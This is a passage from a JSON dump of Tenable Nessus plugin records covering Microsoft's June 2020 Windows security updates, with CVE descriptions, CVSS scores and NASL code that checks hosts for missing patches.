malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561645: Windows Server 2008 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1270", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JUN_4561670.NASL", "href": "https://www.tenable.com/plugins/nessus/137263", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137263);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1270\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561645\");\n script_xref(name:\"MSKB\", value:\"4561670\");\n script_xref(name:\"MSFT\", value:\"MS20-4561645\");\n script_xref(name:\"MSFT\", value:\"MS20-4561670\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561645: Windows Server 2008 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561645\nor cumulative update 4561670. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\");\n # https://support.microsoft.com/en-us/help/4561645/windows-server-2008-update-kb4561645\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ba639f1\");\n # https://support.microsoft.com/en-us/help/4561670/windows-server-2008-update-kb4561670\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?79b91630\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4561645 or Cumulative Update KB4561670.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1236\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561670',\n '4561645'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561670, 4561645])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:15:39", "description": "The remote Windows host is missing security update 4561669 or cumulative update 4561643. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1246, CVE-2020-1262)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1260", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1281", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1317", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561643.NASL", "href": "https://www.tenable.com/plugins/nessus/137260", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137260);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1260\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1281\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1317\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561669\");\n script_xref(name:\"MSKB\", value:\"4561643\");\n script_xref(name:\"MSFT\", value:\"MS20-4561669\");\n script_xref(name:\"MSFT\", value:\"MS20-4561643\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561669: Windows 7 and Windows Server 2008 R2 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561669\nor cumulative update 4561643. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1263)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly 